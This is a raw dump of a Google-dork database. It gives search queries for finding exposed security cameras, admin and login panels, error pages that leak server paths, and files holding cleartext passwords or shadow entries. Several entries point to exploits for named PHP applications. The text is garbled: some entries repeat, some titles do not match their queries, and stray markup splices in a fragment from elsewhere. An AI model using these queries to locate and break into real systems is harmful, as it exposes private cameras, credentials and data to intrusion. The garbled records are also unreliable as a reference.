[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+php+photo+album%22+%7C+inurl%3A%22main.php%3Fcmd%3Dalbum%22+-demo2+-pitanje+&filter=0[url]]
[[dork]"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje [dork]]
[end][1733]]
[[start][1734]
[[title]intitle:"IVC Control Panel"[title]]
[[descr]this searches for security cameras, vendor site:<br>
http://www.ivcco.com/[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22IVC+Control+Panel%22&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]intitle:"IVC Control Panel"[dork]]
[end][1734]]
[[start][1735]
[[title](intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)[[title]]
[[descr]more cams...<br>
<br>
vendor site: http://www.mobotix.com/layout/set/index/language/index[descr]]
[[url]http://www.google.com/search?q=(intitle:MOBOTIX+intitle:PDAS)+%7C+(intitle:MOBOTIX+intitle:Seiten)+%7C+(inurl:/pda/index.html+%2Bcamera)&num=100&hl=en&lr=&filter=0[url]]
[[dork](intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)[dork]]
[end][1735]]
[[start][1737]
[[title]intitle:"MvBlog powered"[title]]
[[descr]MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.<br>
<br>
The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.<br>
<br>
http://www.securityfocus.com/bid/17481/discuss[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22MvBlog+powered%22&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]]
[[dork]intitle:"MvBlog powered"[dork]]
[end][1737]]
[[start][1738]
[[title]intitle:"ShowIt-Admin"[title]]
[[descr]it seems to be some application for managing pictures at web site. unfortunately i dont' speak german.<br>
<br>
http://www.suedweb.de/content_showit/<br>
<br>
something interesting here:<br>
<br>
http://[target]/[path]/admin/phpinfo.php[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22ShowIt-Admin%22&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]]
[[dork]intitle:"ShowIt-Admin"[dork]]
[end][1738]]
[[start][1739]
[[title]"powered by active php bookmarks" | inurl:bookmarks/view_group.php?id=[[title]]
[[descr]Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.<br>
<br>
exploit (i haven't tested it)<br>
http://www.securityfocus.com/archive/1/305392<br>
<br>
my version of exploit<br>
http://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps[descr]]
[[url]http://www.google.com/search?hl=en&q=%22powered+by+active+php+bookmarks%22+%7C+inurl%3Abookmarks%2Fview_group.php%3Fid%3D&btnG=H%C4%BEada%C5%A5+v+Google&meta=&num=100[url]]
[[dork]"powered by active php bookmarks" | inurl:bookmarks/view_group.php?id=[dork]]
[end][1739]]
[[start][1740]
[[title]Please enter a valid password! inurl:polladmin[[title]]
[[descr]The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.<br>
<br>
more generic dork:<br>
"Powered by PHP Poll Wizard" | intitle:"php poll wizard" [descr]]
[[url]http://www.google.com/search?hl=en&q=Please+enter+a+valid+password%21+inurl%3Apolladmin&btnG=H%C4%BEada%C5%A5&meta=[url]]
[[dork]Please enter a valid password! inurl:polladmin[dork]]
[end][1740]]
[[start][1741]
[[title]"Warning: Division by zero in" "on line" -forum[[title]]
[[descr]Just another error that reveals full paths.[descr]]
[[url]http://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&num=100&hl=en&lr=&start=0&sa=N[url]]
[[dork]"Warning: Division by zero in" "on line" -forum[dork]]
[end][1741]]
[[start][1742]
[[title]inurl:resetcore.php ext:php[[title]]
[[descr]e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development.<br>
<br>
rgods exploit:<br>
http://retrogod.altervista.org/e107remote.html<br>
[descr]]
[[url]http://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&num=100&hl=en&lr=&start=0&sa=N[url]]
[[dork]"Warning: Division by zero in" "on line" -forum[dork]]
[end][1742]]
[[start][1743]
[[title]"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum[[title]]
[[descr]This dork reveals logins to databases that were denied for some reason.<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A+mysql_connect%28%29%3A+Access+denied+for+user%3A+%27*%40*%22+%22on+line%22++-help+-forum&btnG=Search[url]]
[[dork]"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum[dork]]
[end][1743]]
[[start][1744]
[[title]"Warning:" "failed to open stream: HTTP request failed" "on line"[title]]
[[descr]Just another error message.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A%22+%22failed+to+open+stream%3A+HTTP+request+failed%22+%22on+line%22+&btnG=Search[url]]
[[dork]"Warning:" "failed to open stream: HTTP request failed" "on line" [dork]]
[end][1744]]
[[start][1745]
[[title]"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum[[title]]
[[descr]and another error. open it from cache when not working.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A+Bad+arguments+to+%28join%7Cimplode%29+%28%29+in%22+%22on+line%22+-help+-forum&btnG=Search[url]]
[[dork]"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum[dork]]
[end][1745]]
[[start][1746]
[[title]"Unable to jump to row" "on MySQL result index" "on line"[title]]
[[descr]another error message[descr]]
[[url]http://www.google.com/search?q=%22Unable+to+jump+to+row%22+%22on+MySQL+result+index%22+%22on+line%22&num=100&hl=en&lr=&start=0&sa=N[url]]
[[dork]"Unable to jump to row" "on MySQL result index" "on line"[dork]]
[end][1746]]
[[start][1747]
[[title]"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"[title]]
[[descr]Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adapt<br>
<br>
my exploit:<br>
http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22This+script+was+created+by+Php-ZeroNet%22+%22Script+.+Php-ZeroNet%22+&btnG=Search[url]]
[[dork]"This script was created by Php-ZeroNet" "Script . Php-ZeroNet" [dork]]
[end][1747]]
[[start][1746]
[[title]"Unable to jump to row" "on MySQL result index" "on line"[title]]
[[descr]another error message[descr]]
[[url]http://www.google.com/search?q=%22Unable+to+jump+to+row%22+%22on+MySQL+result+index%22+%22on+line%22&num=100&hl=en&lr=&start=0&sa=N[url]]
[[dork]"Unable to jump to row" "on MySQL result index" "on line"[dork]]
[end][1746]]
[[start][1747]
[[title]"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"[title]]
[[descr]Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adapt<br>
<br>
my exploit:<br>
http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22This+script+was+created+by+Php-ZeroNet%22+%22Script+.+Php-ZeroNet%22+&btnG=Search[url]]
[[dork]"This script was created by Php-ZeroNet" "Script . Php-ZeroNet" [dork]]
[end][1747]]
[[start][1748]
[[title]inurl:"login.php" "powered by WebChat"[title]]
[[descr]WebChat is an chat application for JavaScript compatible web browsers made in PHP. [descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22login.php%22+%22powered+by+WebChat%22&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]]
[[dork]inurl:"login.php" "powered by WebChat"[dork]]
[end][1748]]
[[start][1749]
[[title]"delivered by mailman" inurl:admin/mailman | intitle:"Mailman Administrator Authentication"[title]]
[[descr]Mailman is free software for managing electronic mail discussion and e-newsletter lists. Mailman is integrated with the web, making it easy for users to manage their accounts and for list owners to administer their lists. Mailman supports built-in archiving, automatic bounce processing, content filtering, digest delivery, spam filters, and more. <br>
<br>
an interesting vulnerability:<br>
http://www.gnu.org/software/mailman/security.html<br>
http://lists.grok.org.uk/pipermail/full-disclosure/2005-February/031562.html<br>
http://www.securityspace.com/smysecure/catid.html?id=16339 [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22delivered+by+mailman%22+inurl%3Aadmin%2Fmailman+%7C+intitle%3A%22Mailman+Administrator+Authentication%22+&btnG=Search[url]]
[[dork]"delivered by mailman" inurl:admin/mailman | intitle:"Mailman Administrator Authentication" [dork]]
[end][1749]]
[[start][1750]
[[title]intitle:"php upload to my ftp" "PHP Upload To My FTP"[title]]
[[descr]some script that allows to upload files on web server. [descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22php+upload+to+my+ftp%22+%22PHP+Upload+To+My+FTP%22+&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]]
[[dork]intitle:"php upload to my ftp" "PHP Upload To My FTP" [dork]]
[end][1750]]
[[start][1751]
[[title]"You have not provided a survey identification number" ERROR -xoops.org "please contact"[title]]
[[descr]sql injection:<br>
http://www.securityfocus.com/bid/16077/discuss<br>
<br>
remote command execution:<br>
http://retrogod.altervista.org/phpsurveyor_0995_xpl.html<br>
<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=phpsurveyor+%22%5BExit+and+Clear+Survey%5D%22&btnG=H%C4%BEada%C5%A5&meta=[url]]
[[dork]phpsurveyor "[Exit and Clear Survey]"[dork]]
[end][1751]]
[[start][1752]
[[title]"Cannot use a scalar value as an array in" "on line" -issues -help -problem[[title]]
[[descr]another error messages[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Cannot+use+a+scalar+value+as+an+array+in%22+%22on+line%22+-issues+-help+-problem&btnG=H%C4%BEada%C5%A5&meta=[url]]
[[dork]"Cannot use a scalar value as an array in" "on line" -issues -help -problem[dork]]
[end][1752]]
[[start][1753]
[[title]intitle:"HelpDesk" "If you need additional help, please email helpdesk at"[title]]
[[descr]it's another helpdesk application.<br>
<br>
my exploit:<br>
http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22HelpDesk%22+%22If+you+need+additional+help%2C+please+email+helpdesk+at%22&btnG=H%C4%BEada%C5%A5&meta=[url]]
[[dork]intitle:"HelpDesk" "If you need additional help, please email helpdesk at"[dork]]
[end][1753]]
[[start][1756]
[[title]inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"[title]]
[[descr]this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)<br>
<br>
exploit:<br>
http://seclists.org/lists/bugtraq/2006/Mar/0058.html[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Adatabase.php+%7C+inurl%3Ainfo_db.php+ext%3Aphp+%22Database+V2.*%22+%22Burning+Board+*%22[url]]
[[dork]inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"[dork]]
[end][1756]]
[[start][1757]
[[title]inurl:"php121login.php"[title]]
[[descr]"PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!" [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22php121login.php%22&btnG=Search[url]]
[[dork]inurl:"php121login.php"[dork]]
[end][1757]]
[[start][1758]
[[title]"The statistics were last updated" "Daily"-microsoft.com[[title]]
[[descr]Results include many varius Network activity logs[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22The+statistics+were+last+updated%22+%22Daily%22-microsoft.com&btnG=Search[url]]
[[dork]"The statistics were last updated" "Daily"-microsoft.com[dork]]
[end][1758]]
[[start][1759]
[[title](intitle:"phpop: login")|(intext:"You have attempted an action that requires you to be authenticated.")|(intitle:"bookmarker: login")[[title]]
[[descr]Background - "phpop was written to solve a very simple problem for me - How do I send and receive e-mail when all I have is a web browser." [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22phpop%3A+login%22%29%7C%28intext%3A%22You+have+attempted+an+action+that+requires+you+to+be+authenticated.%22%29%7C%28intitle%3A%22bookmarker%3A+login%22%29&btnG=Search[url]]
[[dork](intitle:"phpop: login")|(intext:"You have attempted an action that requires you to be authenticated.")|(intitle:"bookmarker: login")[dork]]
[end][1759]]
[[start][1760]
[[title]intitle:"Employee Intranet Login"[title]]
[[descr]Intranet login pages by decentrix.com[descr]]
[[url]http://www.google.com/search?q=intitle:%22Employee+Intranet+Login%22&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:"Employee Intranet Login"[dork]]
[end][1760]]
[[start][1761]
[[title]intitle:"Uploader - Uploader v6" -pixloads.com[[title]]
[[descr]File upload servers, dangerous if used in couple with mytrashmail.com[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22Uploader+-+Uploader+v6%22+-pixloads.com&btnG=Search[url]]
[[dork]intitle:"Uploader - Uploader v6" -pixloads.com[dork]]
[end][1761]]
[[start][1762]
[[title]inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"[title]]
[[descr]Customer login pages<br>
<br>
"SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office<br>
integration." [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22%2Fslxweb.dll%2Fexternal%3Fname%3D%28custportal%7Cwebticketcust%29%22&btnG=Search[url]]
[[dork]inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"[dork]]
[end][1762]]
[[start][1763]
[[title](intitle:"Please login - Forums powered by WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")[[title]]
[[descr]"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions."descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22Please+login+-+Forums+powered+by+WWWThreads%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.php%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.pl%3FCat%3D%22%29&btnG=Search[url]]
[[dork](intitle:"Please login - Forums powered by WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")[dork]]
[end][1763]]
[[start][1764]
[[title]intitle:"Apache Status" "Apache Server Status for"[title]]
[[descr]New Apache Server Status Dork[descr]]
[[url]http://www.google.com/search?q=intitle:%22Apache+Status%22+%22Apache+Server+Status+for%22&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:"Apache Status" "Apache Server Status for"[dork]]
[end][1764]]
[[start][1765]
[[title](intitle:"rymo Login")|(intext:"Welcome to rymo") -family[[title]]
[[descr]"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending." [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1765]]
[[start][1766]
[[title]intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com[[title]]
[[descr]"TrackerCam® is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server." [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%28%22TrackerCam+Live+Video%22%29%7C%28%22TrackerCam+Application+Login%22%29%7C%28%22Trackercam+Remote%22%29+-trackercam.com&btnG=Search[url]]
[[dork]intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com[dork]]
[end][1766]]
[[start][1767]
[[title]"SquirrelMail version" "By the SquirrelMail Development Team"[title]]
[[descr]More SquirrelMail Logins[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22SquirrelMail+version%22+%22By+the+SquirrelMail+Development+Team%22&btnG=Search[url]]
[[dork]"SquirrelMail version" "By the SquirrelMail Development Team"[dork]]
[end][1767]]
[[start][1768]
[[title]intitle:"TWIG Login"[title]]
[[descr]"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements." [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22TWIG%20Login%22[url]]
[[dork]intitle:"TWIG Login"[dork]]
[end][1768]]
[[start][1769]
[[title]intitle:IMP inurl:imp/index.php3[[title]]
[[descr]Webmail Login pages for IMP<br>
<br>
"IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access." [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3AIMP+inurl%3Aimp%2Findex.php3&btnG=Search[url]]
[[dork]intitle:IMP inurl:imp/index.php3[dork]]
[end][1769]]
[[start][1770]
[[title](intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")[[title]]
[[descr]SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).<br>
SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. [descr]]
[[url]http://www.google.com/search?q=(intitle:%22SHOUTcast+Administrator%22)%7C(intext:%22U+SHOUTcast+D.N.A.S.+Status%22)&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork](intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")[dork]]
[end][1770]]
[[start][1771]
[[title]intitle:"SHOUTcast Administrator" inurl:admin.cgi[[title]]
[[descr]Login pages for SHOUTcast<br>
<br>
"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).<br>
SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. "descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22SHOUTcast+Administrator%22+inurl%3Aadmin.cgi&btnG=Search[url]]
[[dork]intitle:"SHOUTcast Administrator" inurl:admin.cgi[dork]]
[end][1771]]
[[start][1772]
[[title]intext:"Target Multicast Group" "beacon"[title]]
[[descr]"... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.<br>
<br>
Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network."<br>
<br>
see h**p://beacon.dast.nlanr.net[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intext%3A%22Target+Multicast+Group%22+%22beacon%22&btnG=Search[url]]
[[dork]intext:"Target Multicast Group" "beacon"[dork]]
[end][1772]]
[[start][1773]
[[title](intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb")[[title]]
[[descr]Logins for Forums powered by UBB.threads[descr]]
[[url]http://www.google.com/search?q=(intitle:%22Please+login+-+Forums+powered+by+UBB.threads%22)%7C(inurl:login.php+%22ubb%22)&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork](intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb")[dork]]
[end][1773]]
[[start][1774]
[[title]intitle:"Device Status Summary Page" -demo[[title]]
[[descr]hxxp://www.netbotz.com/products/index.html<br>
Network/server/room security and enviromental alarm device.<br>
O yea, they have cameras on them, fun to watch IT people...... woo<br>
<br>
Includes:<br>
<br>
Temperature (°F)<br>
Humidity (%)<br>
Air Flow (ft/min)<br>
Audio Alarm:<br>
Door Switch:[descr]]
[[url]http://www.google.com/search?q=intitle:%22Device+Status+Summary+Page%22+-demo&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:"Device Status Summary Page" -demo[dork]]
[end][1774]]
[[start][1775]
[[title](intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")[[title]]
[[descr]Login Pages for WebMyStyle.<br>
<br>
"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites."descr]]
[[url]http://www.google.com/search?q=(intitle:%22WmSC+e-Cart+Administration%22)%7C(intitle:%22WebMyStyle+e-Cart+Administration%22)&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork](intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")[dork]]
[end][1775]]
[[start][1776]
[[title]inurl:"av_viewer.html" | inurl:"av_contents1.html" | inurl:"j_contents1.html" | inurl:"j_viewer.html" -site:altcode.com[[title]]
[[descr]Finds all cameras by manufacturer Linudex<br>
h**p://linudix.com/ [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22av_viewer.html%22+%7C+inurl%3A%22av_contents1.html%22+%7C+inurl%3A%22j_contents1.html%22+%7C+inurl%3A%22j_viewer.html%22+-site%3Aaltcode.com&btnG=Search[url]]
[[dork]inurl:"av_viewer.html" | inurl:"av_contents1.html" | inurl:"j_contents1.html" | inurl:"j_viewer.html" -site:altcode.com[dork]]
[end][1776]]
[[start][1777]
[[title]intitle:"eXist Database Administration" -demo[[title]]
[[descr]Login Pages <br>
<br>
"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features."descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22eXist+Database+Administration%22+-demo&btnG=Search[url]]
[[dork]intitle:"eXist Database Administration" -demo[dork]]
[end][1777]]
[[start][1778]
[[title]intitle:"Apache Tomcat" "Error Report"[title]]
[[descr]Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Apache+Tomcat%22+%22Error+Report%22[url]]
[[dork]intitle:"Apache Tomcat" "Error Report"[dork]]
[end][
]]></plaintext></filetype:ini></filetype:pdb></site></site></intitle:"1&1></a></b></font></p></inurl:ubbthreads></intitle:"website></div>
Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22ORA-00921%3A+unexpected+end+of+SQL+command%22[url]]
[[dork]"ORA-00921: unexpected end of SQL command"[dork]]
[end][57]]
[[start][58]
[[title]passlist.txt (a better way)[[title]]
[[descr]Cleartext passwords. No decryption required![descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Apasslist.txt[url]]
[[dork]inurl:passlist.txt[dork]]
[end][58]]
[[start][59]
[[title]sitebuildercontent[[title]]
[[descr]
dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+dead.letter[url]]
[[dork]intitle:index.of dead.letter[dork]]
[end][111]]
[[start][112]
[[title]intitle:index.of ws_ftp.ini[[title]]
[[descr]
This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3AIndex.of+etc+shadow[url]]
[[dork]intitle:Index.of etc shadow[dork]]
[end][115]]
[[start][116]
[[title]inurl:ManyServers.htm[[title]]
[[descr]